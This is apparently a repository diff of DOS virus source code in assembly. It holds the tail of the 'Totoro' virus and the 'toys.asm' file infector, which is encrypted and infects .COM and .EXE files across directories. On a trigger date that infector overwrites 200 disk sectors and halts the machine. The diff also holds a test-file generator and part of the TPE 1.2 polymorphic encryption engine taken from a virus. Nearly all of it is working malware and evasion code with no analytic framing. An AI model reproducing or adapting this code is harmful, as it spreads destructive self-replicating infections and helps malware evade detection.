inc si
|
||||
inc di
|
||||
loop Scroll_Sideways
|
||||
retn
|
||||
|
||||
Print_Message:
|
||||
xor bx,bx
|
||||
push cs
|
||||
pop ds
|
||||
db 8dh,36h,18h,06 ;lea si,cs:[Totoro_Design]
|
||||
mov ah,0Eh
|
||||
Print_Loop:
|
||||
lodsb
|
||||
int 10h ;Write Char in Teletype mode
|
||||
cmp byte ptr [si],24h ;is it a '$'?
|
||||
jne Print_Loop ;Nope, continue writing
|
||||
retn
|
||||
|
||||
Scroll_Area:
|
||||
xor bx,bx ;Video Page 0
|
||||
mov ah,3
|
||||
int 10h ;Get Cursor info
|
||||
|
||||
push dx ;Push Cursor Location (DX)
|
||||
mov ah,6
|
||||
mov bh,7
|
||||
mov al,18h
|
||||
xor cx,cx
|
||||
mov dh,18h
|
||||
mov dl,4Fh
|
||||
int 10h ;Scroll up (clear screen)
|
||||
|
||||
mov ah,2
|
||||
pop dx
|
||||
sub dh,2
|
||||
xor bx,bx
|
||||
int 10h ;Reset Cursor
|
||||
|
||||
xor bx,bx
|
||||
xor dx,dx
|
||||
mov ah,2
|
||||
int 10h ;Set Cursor for printing.
|
||||
retn
|
||||
|
||||
Totoro_Design:
|
||||
db ' ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·',0Dh, 0Ah
|
||||
db ' º Totoro Dragon º',0Dh, 0Ah
|
||||
db ' ºHello! I am TOTORO CATº',0Dh, 0Ah
|
||||
db ' º Written by Y.T.J.C.T º',0Dh, 0Ah
|
||||
db ' º in Ping Tung. TAIWAN º',0Dh, 0Ah
|
||||
db ' º Don''t Worry,be Happy º',0Dh, 0Ah
|
||||
db ' ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ$'
|
||||
Marker db 'YTIT'
|
||||
db 28 dup (0)
|
||||
|
||||
;***************************************************************************
|
||||
;*End of virus. The bytes below this line are the infected program and the *
|
||||
;* viruses' identification bytes. *
|
||||
;***************************************************************************
|
||||
|
||||
Host_Program:
|
||||
mov ax,4c00
|
||||
int 21
|
||||
|
||||
Infected_Mark db 'YTIT'
|
||||
end start
|
|
@ -0,0 +1,381 @@
|
|||
; toys.asm : Unknown by Unknown
|
||||
; Created wik the Phalcon/Skism Mass-Produced Code Generator
|
||||
; from the configuration file skeleton.cfg
|
||||
|
||||
.model tiny ; Handy directive
|
||||
.code ; Virus code segment
|
||||
org 100h ; COM file starting IP
|
||||
|
||||
id = 'FZ' ; ID word for EXE infections
|
||||
entry_point: db 0e9h,0,0 ; jmp decrypt
|
||||
|
||||
decrypt: loop decrypt ; handles encryption and decryption
|
||||
patch_startencrypt:
|
||||
mov si,offset startencrypt ; start of decryption
|
||||
mov dx,(offset heap - offset startencrypt)/2 ; iterations
|
||||
decrypt_loop:
|
||||
db 2eh,81h,34h ; xor word ptr cs:[si], xxxx
|
||||
decrypt_value dw 0 ; initialised at zero for null effect
|
||||
inc si ; calculate new decryption location
|
||||
inc si
|
||||
dec dx ; If we are not done, then
|
||||
jnz decrypt_loop ; decrypt mo'
|
||||
startencrypt:
|
||||
call next ; calculate delta offset
|
||||
next: pop bp ; bp = IP next
|
||||
sub bp,offset next ; bp = delta offset
|
||||
|
||||
cmp sp,id ; COM or EXE?
|
||||
je restoreEXE
|
||||
restoreCOM:
|
||||
lea si,[bp+save3]
|
||||
mov di,100h
|
||||
push di ; For later return
|
||||
movsb
|
||||
jmp short restoreEXIT
|
||||
restoreEXE:
|
||||
push ds
|
||||
push es
|
||||
push cs ; DS = CS
|
||||
pop ds
|
||||
push cs ; ES = CS
|
||||
pop es
|
||||
lea si,[bp+jmpsave2]
|
||||
lea di,[bp+jmpsave]
|
||||
movsw
|
||||
movsw
|
||||
movsw
|
||||
restoreEXIT:
|
||||
movsw
|
||||
|
||||
mov byte ptr [bp+numinfec],2 ; reset infection counter
|
||||
|
||||
mov ah,1Ah ; Set new DTA
|
||||
lea dx,[bp+newDTA] ; new DTA @ DS:DX
|
||||
int 21h
|
||||
|
||||
mov ah,47h ; Get current directory
|
||||
mov dl,0 ; Current drive
|
||||
lea si,[bp+origdir] ; DS:SI->buffer
|
||||
int 21h
|
||||
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
|
||||
|
||||
mov ax,3524h ; Get int 24 handler
|
||||
int 21h ; to ES:BX
|
||||
mov word ptr [bp+oldint24],bx; Save it
|
||||
mov word ptr [bp+oldint24+2],es
|
||||
mov ah,25h ; Set new int 24 handler
|
||||
lea dx,[bp+offset int24] ; DS:DX->new handler
|
||||
int 21h
|
||||
push cs ; Restore ES
|
||||
pop es ; 'cuz it was changed
|
||||
|
||||
dir_scan: ; "dot dot" traversal
|
||||
lea dx,[bp+exe_mask]
|
||||
call infect_mask
|
||||
lea dx,[bp+com_mask]
|
||||
call infect_mask
|
||||
mov ah,3bh ; change directory
|
||||
lea dx,[bp+dot_dot] ; "cd .."
|
||||
int 21h
|
||||
jnc dir_scan ; go back for mo!
|
||||
|
||||
done_infections:
|
||||
mov ah,2ah ; Get current date
|
||||
int 21h
|
||||
cmp dh,6 ; Check month
|
||||
cmp dl,19 ; Check date
|
||||
jb exit_virus
|
||||
cmp al,-1 ; Check date of week
|
||||
jz activate
|
||||
|
||||
mov ah,2ch ; Get current time
|
||||
int 21h
|
||||
cmp ch,18 ; Check the hour
|
||||
jnz exit_virus
|
||||
cmp cl,-1 ; Check the minute
|
||||
jnz exit_virus
|
||||
cmp dh,-1 ; Check the seconds
|
||||
jnz exit_virus
|
||||
exit_virus:
|
||||
mov ax,2524h ; Restore int 24 handler
|
||||
lds dx,[bp+offset oldint24] ; to original
|
||||
int 21h
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov ah,3bh ; change directory
|
||||
lea dx,[bp+origdir-1] ; original directory
|
||||
int 21h
|
||||
|
||||
mov ah,1ah ; restore DTA to default
|
||||
mov dx,80h ; DTA in PSP
|
||||
cmp sp,id-4 ; EXE or COM?
|
||||
jz returnEXE
|
||||
returnCOM:
|
||||
int 21h
|
||||
retn ; 100h is on stack
|
||||
returnEXE:
|
||||
pop es
|
||||
pop ds
|
||||
int 21h
|
||||
mov ax,es ; AX = PSP segment
|
||||
add ax,10h ; Adjust for PSP
|
||||
add word ptr cs:[bp+jmpsave+2],ax
|
||||
add ax,word ptr cs:[bp+stacksave+2]
|
||||
cli ; Clear intrpts for stack manipulation
|
||||
mov sp,word ptr cs:[bp+stacksave]
|
||||
mov ss,ax
|
||||
sti
|
||||
db 0eah ; jmp ssss:oooo
|
||||
jmpsave dd ? ; Original CS:IP
|
||||
stacksave dd ? ; Original SS:SP
|
||||
jmpsave2 db ? ; Actually four bytes
|
||||
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
|
||||
stacksave2 dd ?
|
||||
|
||||
activate: mov si,offset data00 ; SI points to data
|
||||
mov ah,0Eh ; BIOS display char. function
|
||||
display_loop: lodsb ; Load the next char. into AL
|
||||
or al,al ; Is the character a null?
|
||||
je disp_strnend ; If it is, exit
|
||||
int 010h ; BIOS video interrupt
|
||||
jmp short display_loop ; Do the next character
|
||||
disp_strnend:
|
||||
|
||||
mov ax,0002h ; First argument is 2
|
||||
mov cx,00C8h ; Second argument is 200
|
||||
cli ; Disable interrupts (no Ctrl-C)
|
||||
cwd ; Clear DX (start with sector 0)
|
||||
int 026h ; DOS absolute write interrupt
|
||||
sti ; Restore interrupts
|
||||
|
||||
cli ; Clear the interrupt flag
|
||||
hlt ; HaLT the computer
|
||||
jmp short $ ; Just to make sure
|
||||
|
||||
jmp exit_virus
|
||||
|
||||
data00 db 10,13,"All my toys are broken",13,10
|
||||
db "And so am I inside.",13,10
|
||||
db "The carnival has closed",13,10
|
||||
db "Years ago...",13,10,0
|
||||
|
||||
;creator db '[MPC]',0 ; Mass Produced Code Generator
|
||||
|
||||
infect_mask:
|
||||
mov ah,4eh ; find first file
|
||||
mov cx,7 ; any attribute
|
||||
findfirstnext:
|
||||
int 21h ; DS:DX points to mask
|
||||
jc exit_infect_mask ; No mo files found
|
||||
|
||||
mov al,0h ; Open read only
|
||||
call open
|
||||
|
||||
mov ah,3fh ; Read file to buffer
|
||||
lea dx,[bp+buffer] ; @ DS:DX
|
||||
mov cx,1Ah ; 1Ah bytes
|
||||
int 21h
|
||||
|
||||
mov ah,3eh ; Close file
|
||||
int 21h
|
||||
|
||||
cmp word ptr [bp+buffer],'ZM'; EXE?
|
||||
jz checkEXE ; Why yes, yes it is!
|
||||
checkCOM:
|
||||
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
|
||||
cmp ax,50000 ; Is it too large?
|
||||
ja find_next
|
||||
|
||||
mov bx,word ptr [bp+buffer+1]; get jmp location
|
||||
add bx,heap-decrypt+3 ; Adjust for virus size
|
||||
cmp ax,bx
|
||||
je find_next ; already infected
|
||||
jmp infect_com
|
||||
checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
|
||||
jnz infect_exe
|
||||
find_next:
|
||||
mov ah,4fh ; find next file
|
||||
jmp short findfirstnext
|
||||
exit_infect_mask: ret
|
||||
|
||||
infect_exe:
|
||||
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
|
||||
mov word ptr [bp+jmpsave2], ax
|
||||
mov word ptr [bp+jmpsave2+2], es
|
||||
|
||||
les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
|
||||
mov word ptr [bp+stacksave2], es
|
||||
mov word ptr [bp+stacksave2+2], ax
|
||||
|
||||
mov ax, word ptr [bp+buffer + 8] ; Get header size
|
||||
mov cl, 4 ; convert to bytes
|
||||
shl ax, cl
|
||||
xchg ax, bx
|
||||
|
||||
les ax, [bp+offset newDTA+26]; Get file size
|
||||
mov dx, es ; to DX:AX
|
||||
push ax
|
||||
push dx
|
||||
|
||||
sub ax, bx ; Subtract header size from
|
||||
sbb dx, 0 ; file size
|
||||
|
||||
mov cx, 10h ; Convert to segment:offset
|
||||
div cx ; form
|
||||
|
||||
mov word ptr [bp+buffer+14h], dx ; New entry point
|
||||
mov word ptr [bp+buffer+16h], ax
|
||||
|
||||
mov word ptr [bp+buffer+0Eh], ax ; and stack
|
||||
mov word ptr [bp+buffer+10h], id
|
||||
|
||||
pop dx ; get file length
|
||||
pop ax
|
||||
|
||||
add ax, heap-decrypt ; add virus size
|
||||
adc dx, 0
|
||||
|
||||
mov cl, 9
|
||||
push ax
|
||||
shr ax, cl
|
||||
ror dx, cl
|
||||
stc
|
||||
adc dx, ax
|
||||
pop ax
|
||||
and ah, 1 ; mod 512
|
||||
|
||||
mov word ptr [bp+buffer+4], dx ; new file size
|
||||
mov word ptr [bp+buffer+2], ax
|
||||
|
||||
push cs ; restore ES
|
||||
pop es
|
||||
|
||||
push word ptr [bp+buffer+14h] ; needed later
|
||||
mov cx, 1ah
|
||||
jmp short finishinfection
|
||||
infect_com: ; ax = filesize
|
||||
mov cx,3
|
||||
sub ax,cx
|
||||
lea si,[bp+offset buffer]
|
||||
lea di,[bp+offset save3]
|
||||
movsw
|
||||
movsb
|
||||
mov byte ptr [si-3],0e9h
|
||||
mov word ptr [si-2],ax
|
||||
add ax,103h
|
||||
push ax ; needed later
|
||||
finishinfection:
|
||||
push cx ; Save # bytes to write
|
||||
xor cx,cx ; Clear attributes
|
||||
call attributes ; Set file attributes
|
||||
|
||||
mov al,2
|
||||
call open
|
||||
|
||||
mov ah,40h ; Write to file
|
||||
lea dx,[bp+buffer] ; Write from buffer
|
||||
pop cx ; cx bytes
|
||||
int 21h
|
||||
|
||||
mov ax,4202h ; Move file pointer
|
||||
xor cx,cx ; to end of file
|
||||
cwd ; xor dx,dx
|
||||
int 21h
|
||||
|
||||
mov ah,2ch ; Get current time
|
||||
int 21h ; dh=sec,dl=1/100 sec
|
||||
mov [bp+decrypt_value],dx ; Set new encryption value
|
||||
lea di,[bp+code_store]
|
||||
mov ax,5355h ; push bp,push bx
|
||||
stosw
|
||||
lea si,[bp+decrypt] ; Copy encryption function
|
||||
mov cx,startencrypt-decrypt ; Bytes to move
|
||||
push si ; Save for later use
|
||||
push cx
|
||||
rep movsb
|
||||
|
||||
lea si,[bp+write] ; Copy writing function
|
||||
mov cx,endwrite-write ; Bytes to move
|
||||
rep movsb
|
||||
pop cx
|
||||
pop si
|
||||
pop dx ; Entry point of virus
|
||||
push di
|
||||
push si
|
||||
push cx
|
||||
rep movsb ; Copy decryption function
|
||||
mov ax,5b5dh ; pop bx,pop bp
|
||||
stosw
|
||||
mov al,0c3h ; retn
|
||||
stosb
|
||||
|
||||
add dx,offset startencrypt - offset decrypt ; Calculate new
|
||||
mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
|
||||
call code_store ; decryption
|
||||
pop cx
|
||||
pop di
|
||||
pop si
|
||||
rep movsb ; Restore decryption function
|
||||
|
||||
mov ax,5701h ; Restore creation date/time
|
||||
mov cx,word ptr [bp+newDTA+16h] ; time
|
||||
mov dx,word ptr [bp+newDTA+18h] ; date
|
||||
int 21h
|
||||
|
||||
mov ah,3eh ; Close file
|
||||
int 21h
|
||||
|
||||
mov ch,0
|
||||
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
|
||||
call attributes ; attributes
|
||||
|
||||
dec byte ptr [bp+numinfec] ; One mo infection
|
||||
jnz mo_infections ; Not enough
|
||||
pop ax ; remove call from stack
|
||||
jmp done_infections
|
||||
mo_infections: jmp find_next
|
||||
|
||||
open:
|
||||
mov ah,3dh
|
||||
lea dx,[bp+newDTA+30] ; filename in DTA
|
||||
int 21h
|
||||
xchg ax,bx
|
||||
ret
|
||||
|
||||
attributes:
|
||||
mov ax,4301h ; Set attributes to cx
|
||||
lea dx,[bp+newDTA+30] ; filename in DTA
|
||||
int 21h
|
||||
ret
|
||||
|
||||
write:
|
||||
pop bx ; Restore file handle
|
||||
pop bp ; Restore relativeness
|
||||
mov ah,40h ; Write to file
|
||||
lea dx,[bp+decrypt] ; Concatenate virus
|
||||
mov cx,heap-decrypt ; # bytes to write
|
||||
int 21h
|
||||
push bx
|
||||
push bp
|
||||
endwrite:
|
||||
|
||||
int24: ; New int 24h (error) handler
|
||||
mov al,3 ; Fail call
|
||||
iret ; Return control
|
||||
|
||||
exe_mask db '*.exe',0
|
||||
com_mask db '*.com',0
|
||||
dot_dot db '..',0
|
||||
heap: ; Variables not in code
|
||||
; The following code is the buffer for the write function
|
||||
code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
|
||||
oldint24 dd ? ; Storage for old int 24h handler
|
||||
backslash db ?
|
||||
origdir db 64 dup (?) ; Current directory buffer
|
||||
newDTA db 43 dup (?) ; Temporary DTA
|
||||
numinfec db ? ; Infections this run
|
||||
buffer db 1ah dup (?) ; read buffer
|
||||
endheap: ; End of virus
|
||||
end entry_point
|
|
@ -0,0 +1,101 @@
|
|||
;----------------------------------------------------------------------------
|
||||
; TPE-GEN - This program generates 50 TPE encrypted test files
|
||||
;
|
||||
; This source can be compiled with MASM 5.0 or TASM 2.01
|
||||
; (and perhaps others too, but this is not tested.)
|
||||
;----------------------------------------------------------------------------
|
||||
|
||||
.model tiny
|
||||
.RADIX 16
|
||||
|
||||
.code
|
||||
|
||||
extrn crypt:near ;external routines in engine
|
||||
extrn rnd_get:near
|
||||
extrn rnd_init:near
|
||||
|
||||
|
||||
org 0100
|
||||
|
||||
begin: call rnd_init ;init. random number generator
|
||||
|
||||
mov dx,offset starttxt ;print message
|
||||
mov ah,09
|
||||
int 21
|
||||
|
||||
mov cx,50d ;repeat 50 times
|
||||
lop: push cx
|
||||
|
||||
mov ah,3C ;create a new file
|
||||
mov dx,offset filename
|
||||
mov cx,0020
|
||||
int 21
|
||||
xchg ax,bx
|
||||
|
||||
push ds
|
||||
push es
|
||||
push bx
|
||||
|
||||
mov ax,cs ;input parameters for engine
|
||||
mov ds,ax
|
||||
add ax,0400
|
||||
mov es,ax ;ES = DS + 400h
|
||||
xor si,si ;code will be right after decr.
|
||||
mov dx,offset hello ;this will be encrtypted
|
||||
mov cx,100d ;length of code to encrypt
|
||||
mov bp,0100 ;decryptor will start at 100h
|
||||
call rnd_get ;AX register will be random
|
||||
|
||||
call crypt ;call the engine
|
||||
|
||||
pop bx ;write crypted file
|
||||
mov ah,40
|
||||
int 21
|
||||
|
||||
mov ah,3E ;close the file
|
||||
int 21
|
||||
|
||||
pop es
|
||||
pop ds
|
||||
|
||||
mov di,offset filename ;adjust name for next file
|
||||
mov bx,7 ; (increment number)
|
||||
incnum: inc byte ptr ds:[bx+di]
|
||||
cmp byte ptr ds:[bx+di],'9'
|
||||
jbe numok
|
||||
mov byte ptr ds:[bx+di],'0'
|
||||
dec bx
|
||||
jnz incnum
|
||||
|
||||
numok: pop cx ;do it again...
|
||||
loop lop
|
||||
|
||||
exit: int 20
|
||||
|
||||
|
||||
;----------------------------------------------------------------------------
|
||||
; Text and data
|
||||
;----------------------------------------------------------------------------
|
||||
|
||||
starttxt db 'TPE-GEN - Generates 50 TPE encrypted test files.'
|
||||
db 0Dh, 0Ah, '$'
|
||||
|
||||
filename db '00000000.COM',0
|
||||
|
||||
|
||||
;----------------------------------------------------------------------------
|
||||
; The small test file that will be encrypted
|
||||
;----------------------------------------------------------------------------
|
||||
|
||||
hello: call next ;get relative offset
|
||||
next: pop dx
|
||||
add dx,10d ;find begin of message
|
||||
mov ah,09 ;print message
|
||||
int 21
|
||||
int 20
|
||||
|
||||
db 'Hello, world!', 0Dh, 0A, '$'
|
||||
db (100d) dup (90)
|
||||
|
||||
end begin
|
||||
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,990 @@
|
|||
.radix 16
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
;
|
||||
; TPE v1.2 Source Code
|
||||
; --------------------
|
||||
;
|
||||
; Extracted from Coffee Shop virus by: Lucifer Messiah -- ANARKICK SYSTEMS
|
||||
;
|
||||
;-----------------------------------------------------------------------------
|
||||
|
||||
.model tiny
|
||||
.code
|
||||
|
||||
public rnd_init
|
||||
public rnd_get
|
||||
public crypt
|
||||
public tpe_bottom
|
||||
public tpe_top
|
||||
|
||||
;****************************************************************************
|
||||
;* Data area for engine
|
||||
;****************************************************************************
|
||||
|
||||
org 0e0
|
||||
TPE12:
|
||||
|
||||
add_val dw 0
|
||||
xor_val dw 0
|
||||
xor_offset dw 0
|
||||
where_len dw 0
|
||||
where_len2 dw 0
|
||||
flags db 0
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* Begin of virus, installation in memory
|
||||
;****************************************************************************
|
||||
|
||||
org 0100
|
||||
|
||||
;****************************************************************************
|
||||
;* Insert virus code here, or compile and link to virus
|
||||
;****************************************************************************
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;*
|
||||
;* Encryption Engine
|
||||
;*
|
||||
;*
|
||||
;* Input: ES work segment
|
||||
;* DS:DX code to encrypt
|
||||
;* BP what will be start of decryptor
|
||||
;* SI what will be distance between decryptor and code
|
||||
;* CX length of code
|
||||
;* AX flags: bit 0: DS will not be equal to CS
|
||||
;* bit 1: insert random instructions
|
||||
;* bit 2: put junk before decryptor
|
||||
;* bit 3: preserve AX with decryptor
|
||||
;*
|
||||
;* Output: ES: work segment (preserved)
|
||||
;* DS:DX decryptor + encrypted code
|
||||
;* BP what will be start of decryptor (preserved)
|
||||
;* DI length of decryptor / offset of encrypted code
|
||||
;* CX length of decryptor + encrypted code
|
||||
;* AX length of encrypted code
|
||||
;* (other registers may be trashed)
|
||||
;*
|
||||
;****************************************************************************
|
||||
|
||||
tpe_top equ $
|
||||
db '[ MK / Trident ]'
|
||||
|
||||
crypt:
|
||||
xor di,di ;di = start of decryptor
|
||||
push dx ;save offset of code
|
||||
push si ;save future offset of code
|
||||
|
||||
mov byte ptr ds:[flags],al ;save flags
|
||||
test al,8 ;push AX?
|
||||
jz no_push
|
||||
mov al,50
|
||||
stosb
|
||||
|
||||
no_push: call rnd_get ;add a few bytes to cx
|
||||
and ax,1F
|
||||
add cx,ax
|
||||
push cx ;save length of code
|
||||
|
||||
call rnd_get ;get random flags
|
||||
xchg ax,bx
|
||||
;BX flags:
|
||||
|
||||
;0,1 how to encrypt
|
||||
;2,3 which register for encryption
|
||||
;4 use byte or word for encrypt
|
||||
;5 MOV AL, MOV AH or MOV AX
|
||||
;6 MOV CL, MOV CH or MOV CX
|
||||
;7 AX or DX
|
||||
|
||||
;8 count up or down
|
||||
;9 ADD/SUB/INC/DEC or CMPSW/SCASW
|
||||
;A ADD/SUB or INC/DEC
|
||||
; CMPSW or SCASW
|
||||
;B offset in XOR instruction?
|
||||
;C LOOPNZ or LOOP
|
||||
; SUB CX or DEC CX
|
||||
;D carry with crypt ADD/SUB
|
||||
;E carry with inc ADD/SUB
|
||||
;F XOR instruction value or AX/DX
|
||||
|
||||
random: call rnd_get ;get random encryption value
|
||||
or al,al
|
||||
jz random ;again if 0
|
||||
mov ds:[xor_val],ax
|
||||
|
||||
call do_junk ;insert random instructions
|
||||
|
||||
pop cx
|
||||
|
||||
mov ax,0111 ;make flags to remember which
|
||||
test bl,20 ; MOV instructions are used
|
||||
jnz z0
|
||||
xor al,07
|
||||
z0: test bl,0C
|
||||
jnz z1
|
||||
xor al,70
|
||||
z1: test bl,40
|
||||
jnz z2
|
||||
xor ah,7
|
||||
z2: test bl,10
|
||||
jnz z3
|
||||
and al,73
|
||||
z3: test bh,80
|
||||
jnz z4
|
||||
and al,70
|
||||
|
||||
z4: mov dx,ax
|
||||
mov_lup: call rnd_get ;put MOV instructions in
|
||||
and ax,000F ; a random order
|
||||
cmp al,0A
|
||||
ja mov_lup
|
||||
|
||||
mov si,ax
|
||||
push cx ;test if MOV already done
|
||||
xchg ax,cx
|
||||
mov ax,1
|
||||
shl ax,cl
|
||||
mov cx,ax
|
||||
and cx,dx
|
||||
pop cx
|
||||
jz mov_lup
|
||||
xor dx,ax ;remember which MOV done
|
||||
|
||||
push dx
|
||||
call do_mov ;insert MOV instruction
|
||||
call do_nop ;insert a random NOP
|
||||
pop dx
|
||||
|
||||
or dx,dx ;all MOVs done?
|
||||
jnz mov_lup
|
||||
|
||||
push di ;save start of decryptor loop
|
||||
|
||||
call do_add_ax ;add a value to AX in loop?
|
||||
call do_nop
|
||||
test bh,20 ;carry with ADD/SUB ?
|
||||
jz no_clc
|
||||
mov al,0F8
|
||||
stosb
|
||||
no_clc: mov word ptr ds:[xor_offset],0
|
||||
call do_xor ;place all loop instructions
|
||||
call do_nop
|
||||
call do_add
|
||||
|
||||
pop dx ;get start of decryptor loop
|
||||
|
||||
call do_loop
|
||||
|
||||
test byte ptr ds:[flags],8 ;insert POP AX ?
|
||||
jz no_pop
|
||||
mov al,58
|
||||
stosb
|
||||
|
||||
no_pop: xor ax,ax ;calculate loop offset
|
||||
test bh,1 ;up or down?
|
||||
jz v1
|
||||
mov ax,cx
|
||||
dec ax
|
||||
test bl,10 ;encrypt with byte or word?
|
||||
jz v1
|
||||
and al,0FE
|
||||
v1: add ax,di
|
||||
add ax,bp
|
||||
pop si
|
||||
add ax,si
|
||||
sub ax,word ptr ds:[xor_offset]
|
||||
mov si,word ptr ds:[where_len]
|
||||
test bl,0C ;are BL,BH used for encryption?
|
||||
jnz v2
|
||||
mov byte ptr es:[si],al
|
||||
mov si,word ptr ds:[where_len2]
|
||||
mov byte ptr es:[si],ah
|
||||
jmp short v3
|
||||
v2: mov word ptr es:[si],ax
|
||||
|
||||
v3: mov dx,word ptr ds:[xor_val] ;encryption value
|
||||
|
||||
pop si ;ds:si = start of code
|
||||
|
||||
push di ;save ptr to encrypted code
|
||||
push cx ;save length of encrypted code
|
||||
|
||||
test bl,10 ;byte or word?
|
||||
jz blup
|
||||
|
||||
inc cx ;cx = # of crypts (words)
|
||||
shr cx,1
|
||||
|
||||
lup: lodsw ;encrypt code (words)
|
||||
call do_encrypt
|
||||
stosw
|
||||
loop lup
|
||||
jmp short klaar
|
||||
|
||||
|
||||
blup: lodsb ;encrypt code (bytes)
|
||||
xor dh,dh
|
||||
call do_encrypt
|
||||
stosb
|
||||
loop blup
|
||||
|
||||
klaar: mov cx,di ;cx = length decryptpr + code
|
||||
pop ax ;ax = length of decrypted code
|
||||
pop di ;di = offset encrypted code
|
||||
xor dx,dx ;ds:dx = decryptor + cr. code
|
||||
push es
|
||||
pop ds
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* encrypt the code
|
||||
;****************************************************************************
|
||||
|
||||
do_encrypt: add dx,word ptr ds:[add_val]
|
||||
test bl,2
|
||||
jnz lup1
|
||||
xor ax,dx
|
||||
ret
|
||||
|
||||
lup1: test bl,1
|
||||
jnz lup2
|
||||
sub ax,dx
|
||||
ret
|
||||
|
||||
lup2: add ax,dx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* generate mov reg,xxxx
|
||||
;****************************************************************************
|
||||
|
||||
do_mov: mov dx,si
|
||||
mov al,byte ptr ds:[si+mov_byte]
|
||||
cmp dl,4 ;BX?
|
||||
jne is_not_bx
|
||||
call add_ind
|
||||
is_not_bx: test dl,0C ;A*?
|
||||
pushf
|
||||
jnz is_not_a
|
||||
test bl,80 ;A* or D*?
|
||||
jz is_not_a
|
||||
add al,2
|
||||
|
||||
is_not_a: call alter ;insert the MOV
|
||||
|
||||
popf ;A*?
|
||||
jnz is_not_a2
|
||||
mov ax,word ptr ds:[xor_val]
|
||||
jmp short sss
|
||||
|
||||
is_not_a2: test dl,8 ;B*?
|
||||
jnz is_not_b
|
||||
mov si,offset where_len
|
||||
test dl,2
|
||||
jz is_not_bh
|
||||
add si,2
|
||||
is_not_bh: mov word ptr ds:[si],di
|
||||
jmp short sss
|
||||
|
||||
is_not_b: mov ax,cx ;C*
|
||||
test bl,10 ;byte or word encryption?
|
||||
jz sss
|
||||
inc ax ;only half the number of bytes
|
||||
shr ax,1
|
||||
sss: test dl,3 ;byte or word register?
|
||||
jz is_x
|
||||
test dl,2 ;*H?
|
||||
jz is_not_h
|
||||
xchg al,ah
|
||||
is_not_h: stosb
|
||||
ret
|
||||
|
||||
is_x: stosw
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* insert MOV or alternative for MOV
|
||||
;****************************************************************************
|
||||
|
||||
alter: push bx
|
||||
push cx
|
||||
push ax
|
||||
call rnd_get
|
||||
xchg ax,bx
|
||||
pop ax
|
||||
test bl,3 ;use alternative for MOV?
|
||||
jz no_alter
|
||||
|
||||
push ax
|
||||
and bx,0F
|
||||
and al,08
|
||||
shl ax,1
|
||||
or bx,ax
|
||||
pop ax
|
||||
|
||||
and al,7
|
||||
mov cl,9
|
||||
xchg ax,cx
|
||||
mul cl
|
||||
|
||||
add ax,30C0
|
||||
xchg al,ah
|
||||
test bl,4
|
||||
jz no_sub
|
||||
mov al,28
|
||||
no_sub: call maybe_2
|
||||
stosw
|
||||
|
||||
mov al,80
|
||||
call maybe_2
|
||||
stosb
|
||||
|
||||
mov ax,offset add_mode
|
||||
xchg ax,bx
|
||||
and ax,3
|
||||
xlat
|
||||
|
||||
add al,cl
|
||||
no_alter: stosb
|
||||
pop cx
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* insert ADD AX,xxxx
|
||||
;****************************************************************************
|
||||
|
||||
do_add_ax: push cx
|
||||
mov si,offset add_val ;save add-value here
|
||||
mov word ptr ds:[si],0
|
||||
mov ax,bx
|
||||
and ax,8110
|
||||
xor ax,8010
|
||||
jnz no_add_ax ;use ADD?
|
||||
|
||||
mov ax,bx
|
||||
xor ah,ah
|
||||
mov cl,3
|
||||
div cl
|
||||
or ah,ah
|
||||
jnz no_add_ax ;use ADD?
|
||||
|
||||
test bl,80
|
||||
jnz do_81C2 ;AX or DX?
|
||||
mov al,5
|
||||
stosb
|
||||
jmp short do_add0
|
||||
do_81C2: mov ax,0C281
|
||||
stosw
|
||||
do_add0: call rnd_get
|
||||
mov word ptr ds:[si],ax
|
||||
stosw
|
||||
no_add_ax: pop cx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* generate encryption command
|
||||
;****************************************************************************
|
||||
|
||||
do_xor: test byte ptr ds:[flags],1
|
||||
jz no_cs
|
||||
mov al,2E ;insert CS: instruction
|
||||
stosb
|
||||
|
||||
no_cs: test bh,80 ;type of XOR command
|
||||
jz xor1
|
||||
|
||||
call get_xor ;encrypt with register
|
||||
call do_carry
|
||||
call save_it
|
||||
xor ax,ax
|
||||
test bl,80
|
||||
jz xxxx
|
||||
add al,10
|
||||
xxxx: call add_dir
|
||||
test bh,8
|
||||
jnz yyyy
|
||||
stosb
|
||||
ret
|
||||
|
||||
yyyy: or al,80
|
||||
stosb
|
||||
call rnd_get
|
||||
stosw
|
||||
mov word ptr ds:[xor_offset],ax
|
||||
ret
|
||||
|
||||
xor1: mov al,080 ;encrypt with value
|
||||
call save_it
|
||||
call get_xor
|
||||
call do_carry
|
||||
call xxxx
|
||||
mov ax,word ptr ds:[xor_val]
|
||||
test bl,10
|
||||
jmp byte_word
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* generate increase/decrease command
|
||||
;****************************************************************************
|
||||
|
||||
do_add: test bl,8 ;no CMPSW/SCASW if BX is used
|
||||
jz da0
|
||||
test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW
|
||||
jnz do_cmpsw
|
||||
|
||||
da0: test bh,4 ;ADD/SUB or INC/DEC?
|
||||
jz add1
|
||||
|
||||
mov al,40 ;INC/DEC
|
||||
test bh,1 ;up or down?
|
||||
jz add0
|
||||
add al,8
|
||||
add0: call add_ind
|
||||
stosb
|
||||
test bl,10 ;byte or word?
|
||||
jz return
|
||||
